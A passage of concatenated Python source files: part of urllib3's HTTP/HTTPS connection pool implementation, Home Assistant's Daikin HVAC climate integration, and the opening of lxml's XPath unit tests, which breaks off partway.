conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s" %
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older
httplib_response = conn.getresponse()
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s" % (method, url, http_version,
httplib_response.status,
httplib_response.length))
return httplib_response
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.question_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
if conn:
conn.close()
conn = None
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
if conn:
conn.close()
conn = None
raise
except (TimeoutError, HTTPException, SocketError, ConnectionError) as e:
if conn:
# Discard the connection for these exceptions. It will be
# be replaced during the next _get_conn() call.
conn.close()
conn = None
if isinstance(e, SocketError) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if release_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s" % (retries, err, url))
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
log.info("Redirecting %s -> %s" % (url, redirect_location))
return self.urlopen(method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
retries = retries.increment(method, url, response=response, _pool=self)
retries.sleep()
log.info("Forced retry: %s" % url)
return self.urlopen(method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs`` and
``ssl_version`` are only used if :mod:`ssl` is available and are fed into
:meth:`urllib3.util.ssl_wrap_socket` to upgrade the connection socket
into an SSL socket.
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
**conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.org/en/latest/security.html'),
InsecureRequestWarning)
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
|
|
"""Support for the Daikin HVAC."""
import logging
import re
import voluptuous as vol
from homeassistant.components.climate import ClimateDevice, PLATFORM_SCHEMA
from homeassistant.components.climate.const import (
ATTR_CURRENT_TEMPERATURE, ATTR_FAN_MODE, ATTR_OPERATION_MODE,
ATTR_SWING_MODE, STATE_AUTO, STATE_COOL, STATE_DRY,
STATE_FAN_ONLY, STATE_HEAT, SUPPORT_FAN_MODE,
SUPPORT_OPERATION_MODE, SUPPORT_SWING_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.components.daikin import DOMAIN as DAIKIN_DOMAIN
from homeassistant.components.daikin.const import (
ATTR_INSIDE_TEMPERATURE, ATTR_OUTSIDE_TEMPERATURE, ATTR_TARGET_TEMPERATURE)
from homeassistant.const import (
ATTR_TEMPERATURE, CONF_HOST, CONF_NAME, STATE_OFF, TEMP_CELSIUS)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME): cv.string,
})
HA_STATE_TO_DAIKIN = {
STATE_FAN_ONLY: 'fan',
STATE_DRY: 'dry',
STATE_COOL: 'cool',
STATE_HEAT: 'hot',
STATE_AUTO: 'auto',
STATE_OFF: 'off',
}
DAIKIN_TO_HA_STATE = {
'fan': STATE_FAN_ONLY,
'dry': STATE_DRY,
'cool': STATE_COOL,
'hot': STATE_HEAT,
'auto': STATE_AUTO,
'off': STATE_OFF,
}
HA_ATTR_TO_DAIKIN = {
ATTR_OPERATION_MODE: 'mode',
ATTR_FAN_MODE: 'f_rate',
ATTR_SWING_MODE: 'f_dir',
ATTR_INSIDE_TEMPERATURE: 'htemp',
ATTR_OUTSIDE_TEMPERATURE: 'otemp',
ATTR_TARGET_TEMPERATURE: 'stemp'
}
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Old way of setting up the Daikin HVAC platform.
Can only be called when a user accidentally mentions the platform in their
config. But even in that case it would have been ignored.
"""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Daikin climate based on config_entry."""
daikin_api = hass.data[DAIKIN_DOMAIN].get(entry.entry_id)
async_add_entities([DaikinClimate(daikin_api)])
class DaikinClimate(ClimateDevice):
"""Representation of a Daikin HVAC."""
def __init__(self, api):
"""Initialize the climate device."""
from pydaikin import appliance
self._api = api
self._list = {
ATTR_OPERATION_MODE: list(HA_STATE_TO_DAIKIN),
ATTR_FAN_MODE: list(
map(
str.title,
appliance.daikin_values(HA_ATTR_TO_DAIKIN[ATTR_FAN_MODE])
)
),
ATTR_SWING_MODE: list(
map(
str.title,
appliance.daikin_values(HA_ATTR_TO_DAIKIN[ATTR_SWING_MODE])
)
),
}
self._supported_features = SUPPORT_TARGET_TEMPERATURE \
| SUPPORT_OPERATION_MODE
if self._api.device.support_fan_mode:
self._supported_features |= SUPPORT_FAN_MODE
if self._api.device.support_swing_mode:
self._supported_features |= SUPPORT_SWING_MODE
def get(self, key):
"""Retrieve device settings from API library cache."""
value = None
cast_to_float = False
if key in [ATTR_TEMPERATURE, ATTR_INSIDE_TEMPERATURE,
ATTR_CURRENT_TEMPERATURE]:
key = ATTR_INSIDE_TEMPERATURE
daikin_attr = HA_ATTR_TO_DAIKIN.get(key)
if key == ATTR_INSIDE_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_TARGET_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_OUTSIDE_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_FAN_MODE:
value = self._api.device.represent(daikin_attr)[1].title()
elif key == ATTR_SWING_MODE:
value = self._api.device.represent(daikin_attr)[1].title()
elif key == ATTR_OPERATION_MODE:
# Daikin can return also internal states auto-1 or auto-7
# and we need to translate them as AUTO
daikin_mode = re.sub(
'[^a-z]', '',
self._api.device.represent(daikin_attr)[1])
ha_mode = DAIKIN_TO_HA_STATE.get(daikin_mode)
value = ha_mode
if value is None:
_LOGGER.error("Invalid value requested for key %s", key)
else:
if value in ("-", "--"):
value = None
elif cast_to_float:
try:
value = float(value)
except ValueError:
value = None
return value
def set(self, settings):
"""Set device settings using API."""
values = {}
for attr in [ATTR_TEMPERATURE, ATTR_FAN_MODE, ATTR_SWING_MODE,
ATTR_OPERATION_MODE]:
value = settings.get(attr)
if value is None:
continue
daikin_attr = HA_ATTR_TO_DAIKIN.get(attr)
if daikin_attr is not None:
if attr == ATTR_OPERATION_MODE:
values[daikin_attr] = HA_STATE_TO_DAIKIN[value]
elif value in self._list[attr]:
values[daikin_attr] = value.lower()
else:
_LOGGER.error("Invalid value %s for %s", attr, value)
# temperature
elif attr == ATTR_TEMPERATURE:
try:
values['stemp'] = str(int(value))
except ValueError:
_LOGGER.error("Invalid temperature %s", value)
if values:
self._api.device.set(values)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._supported_features
@property
def name(self):
"""Return the name of the thermostat, if any."""
return self._api.name
@property
def unique_id(self):
"""Return a unique ID."""
return self._api.mac
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self.get(ATTR_CURRENT_TEMPERATURE)
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self.get(ATTR_TARGET_TEMPERATURE)
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return 1
def set_temperature(self, **kwargs):
"""Set new target temperature."""
self.set(kwargs)
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self.get(ATTR_OPERATION_MODE)
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._list.get(ATTR_OPERATION_MODE)
def set_operation_mode(self, operation_mode):
"""Set HVAC mode."""
self.set({ATTR_OPERATION_MODE: operation_mode})
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self.get(ATTR_FAN_MODE)
def set_fan_mode(self, fan_mode):
"""Set fan mode."""
self.set({ATTR_FAN_MODE: fan_mode})
@property
def fan_list(self):
"""List of available fan modes."""
return self._list.get(ATTR_FAN_MODE)
@property
def current_swing_mode(self):
"""Return the fan setting."""
return self.get(ATTR_SWING_MODE)
def set_swing_mode(self, swing_mode):
"""Set new target temperature."""
self.set({ATTR_SWING_MODE: swing_mode})
@property
def swing_list(self):
"""List of available swing modes."""
return self._list.get(ATTR_SWING_MODE)
def update(self):
"""Retrieve latest state."""
self._api.update()
@property
def device_info(self):
"""Return a device description for device registry."""
return self._api.device_info
|
|
# -*- coding: utf-8 -*-
"""
Test cases related to XPath evaluation and the XPath class
"""
import unittest, sys, os.path
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
sys.path.insert(0, this_dir) # needed for Py3
from common_imports import etree, HelperTestCase, _bytes, BytesIO
from common_imports import doctest, make_doctest
class ETreeXPathTestCase(HelperTestCase):
"""XPath tests etree"""
def test_xpath_boolean(self):
tree = self.parse('<a><b></b><b></b></a>')
self.assert_(tree.xpath('boolean(/a/b)'))
self.assert_(not tree.xpath('boolean(/a/c)'))
def test_xpath_number(self):
tree = self.parse('<a>1</a>')
self.assertEquals(1.,
tree.xpath('number(/a)'))
tree = self.parse('<a>A</a>')
actual = str(tree.xpath('number(/a)'))
expected = ['nan', '1.#qnan', 'nanq']
if not actual.lower() in expected:
self.fail('Expected a NAN value, got %s' % actual)
def test_xpath_string(self):
tree = self.parse('<a>Foo</a>')
self.assertEquals('Foo',
tree.xpath('string(/a/text())'))
def test_xpath_document_root(self):
tree = self.parse('<a><b/></a>')
self.assertEquals([],
tree.xpath('/'))
def test_xpath_namespace(self):
tree = self.parse('<a xmlns="test" xmlns:p="myURI"/>')
self.assert_((None, "test") in tree.xpath('namespace::*'))
self.assert_(('p', 'myURI') in tree.xpath('namespace::*'))
def test_xpath_namespace_empty(self):
tree = self.parse('<a/>')
self.assertEquals([('xml', 'http://www.w3.org/XML/1998/namespace')],
tree.xpath('namespace::*'))
def test_xpath_list_elements(self):
tree = self.parse('<a><b>Foo</b><b>Bar</b></a>')
root = tree.getroot()
self.assertEquals([root[0], root[1]],
tree.xpath('/a/b'))
def test_xpath_list_nothing(self):
tree = self.parse('<a><b/></a>')
self.assertEquals([],
tree.xpath('/a/c'))
# this seems to pass a different code path, also should return nothing
self.assertEquals([],
tree.xpath('/a/c/text()'))
def test_xpath_list_text(self):
tree = self.parse('<a><b>Foo</b><b>Bar</b></a>')
root = tree.getroot()
self.assertEquals(['Foo', 'Bar'],
tree.xpath('/a/b/text()'))
def test_xpath_list_text_parent(self):
tree = self.parse('<a><b>FooBar</b><b>BarFoo</b></a>')
root = tree.getroot()
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()'))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in tree.xpath('/a/b/text()')])
def test_xpath_list_text_parent_no_smart_strings(self):
tree = self.parse('<a><b>FooBar</b><b>BarFoo</b></a>')
root = tree.getroot()
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()', smart_strings=True))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in
tree.xpath('/a/b/text()', smart_strings=True)])
self.assertEquals([None, None],
[r.attrname for r in
tree.xpath('/a/b/text()', smart_strings=True)])
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()', smart_strings=False))
self.assertEquals([False, False],
[hasattr(r, 'getparent') for r in
tree.xpath('/a/b/text()', smart_strings=False)])
self.assertEquals([None, None],
[r.attrname for r in
tree.xpath('/a/b/text()', smart_strings=True)])
def test_xpath_list_unicode_text_parent(self):
xml = _bytes('<a><b>FooBar\\u0680\\u3120</b><b>BarFoo\\u0680\\u3120</b></a>').decode("unicode_escape")
tree = self.parse(xml.encode('utf-8'))
root = tree.getroot()
self.assertEquals([_bytes('FooBar\\u0680\\u3120').decode("unicode_escape"),
_bytes('BarFoo\\u0680\\u3120').decode("unicode_escape")],
tree.xpath('/a/b/text()'))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in tree.xpath('/a/b/text()')])
def test_xpath_list_attribute(self):
tree = self.parse('<a b="B" c="C"/>')
self.assertEquals(['B'],
tree.xpath('/a/@b'))
def test_xpath_list_attribute_parent(self):
tree = self.parse('<a b="BaSdFgHjKl" c="CqWeRtZuI"/>')
results = tree.xpath('/a/@c')
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals(tree.getroot().tag, results[0].getparent().tag)
def test_xpath_list_attribute_parent_no_smart_strings(self):
tree = self.parse('<a b="BaSdFgHjKl" c="CqWeRtZuI"/>')
results = tree.xpath('/a/@c', smart_strings=True)
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals('c', results[0].attrname)
self.assertEquals(tree.getroot().tag, results[0].getparent().tag)
results = tree.xpath('/a/@c', smart_strings=False)
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals(False, hasattr(results[0], 'getparent'))
self.assertEquals(False, hasattr(results[0], 'attrname'))
def test_xpath_text_from_other_document(self):
xml_data = '''
<table>
<item xml:id="k1"><value>v1</value></item>
<item xml:id="k2"><value>v2</value></item>
</table>
'''
def lookup(dummy, id):
return etree.XML(xml_data).xpath('id(%r)' % id)
functions = {(None, 'lookup') : lookup}
root = etree.XML('<dummy/>')
values = root.xpath("lookup('k1')/value/text()",
extensions=functions)
self.assertEquals(['v1'], values)
self.assertEquals('value', values[0].getparent().tag)
def test_xpath_list_comment(self):
tree = self.parse('<a><!-- Foo --></a>')
self.assertEquals(['<!-- Foo -->'],
list(map(repr, tree.xpath('/a/node()'))))
def test_rel_xpath_boolean(self):
root = etree.XML('<a><b><c/></b></a>')
el = root[0]
self.assert_(el.xpath('boolean(c)'))
self.assert_(not el.xpath('boolean(d)'))
def test_rel_xpath_list_elements(self):
tree = self.parse('<a><c><b>Foo</b><b>Bar</b></c><c><b>Hey</b></c></a>')
root = tree.getroot()
c = root[0]
self.assertEquals([c[0], c[1]],
c.xpath('b'))
self.assertEquals([c[0], c[1], root[1][0]],
c.xpath('//b'))
def test_xpath_ns(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertEquals(
[root[0]],
tree.xpath('//foo:b', namespaces={'foo': 'uri:a'}))
self.assertEquals(
[],
tree.xpath('//foo:b', namespaces={'foo': 'uri:c'}))
self.assertEquals(
[root[0]],
root.xpath('//baz:b', namespaces={'baz': 'uri:a'}))
def test_xpath_ns_none(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertRaises(
TypeError,
root.xpath, '//b', namespaces={None: 'uri:a'})
def test_xpath_ns_empty(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertRaises(
TypeError,
root.xpath, '//b', namespaces={'': 'uri:a'})
def test_xpath_error(self):
tree = self.parse('<a/>')
self.assertRaises(etree.XPathEvalError, tree.xpath, '\\fad')
def test_xpath_class_error(self):
self.assertRaises(SyntaxError, etree.XPath, '\\fad')
self.assertRaises(etree.XPathSyntaxError, etree.XPath, '\\fad')
def test_xpath_prefix_error(self):
tree = self.parse('<a/>')
self.assertRaises(etree.XPathEvalError, tree.xpath, '/fa:d')
def test_xpath_class_prefix_error(self):
tree = self.parse('<a/>')
xpath = etree.XPath("/fa:d")
self.assertRaises(etree.XPathEvalError, xpath, tree)
def test_elementtree_getpath(self):
a = etree.Element("a")
b = etree.SubElement(a, "b")
c = etree.SubElement(a, "c")
d1 = etree.SubElement(c, "d")
d2 = etree.SubElement(c, "d")
tree = etree.ElementTree(a)
self.assertEqual('/a/c/d',
tree.getpath(d2)[:6])
self.assertEqual([d2],
tree.xpath(tree.getpath(d2)))
def test_elementtree_getpath_partial(self):
a = etree.Element("a")
b = etree.SubElement(a, "b")
c = etree.SubElement(a, "c")
d1 = etree.SubElement(c, "d")
d2 = etree.SubElement(c, "d")
tree = etree.ElementTree(c)
self.assertEqual('/c/d',
tree.getpath(d2)[:4])
self.assertEqual([d2],
tree.xpath(tree.getpath(d2)))
def test_xpath_evaluator(self):
tree = self.parse('<a><b><c></c></b></a>')
e = etree.XPathEvaluator(tree)
root = tree.getroot()
self.assertEquals(
[root],
e('//a'))
def test_xpath_evaluator_tree(self):
tree = self.parse('<a><b><c></c></b></a>')
child_tree = etree.ElementTree(tree.getroot()[0])
e = etree.XPathEvaluator(child_tree)
self.assertEquals(
[],
e('a'))
root = child_tree.getroot()
self.assertEquals(
[root[0]],
e('c'))
def test_xpath_evaluator_tree_absolute(self):
tree = self.parse('<a><b><c></c></b></a>')
child_tree = etree.ElementTree(tree.getroot()[0])
e = etree.XPathEvaluator(child_tree)
self.assertEquals(
[],
e('/a'))
root = child_tree.getroot()
self.assertEquals(
[root],
e('/b'))
self.assertEquals(
[],
e('/c'))
def test_xpath_evaluator_element(self):
tree = self.parse('<a><b><c></c></b></a>')
root = tree.getroot()
e = etree.XPathEvaluator(root[0])
self.assertEquals(
[root[0][0]],
e('c'))
def test_xpath_extensions(self):
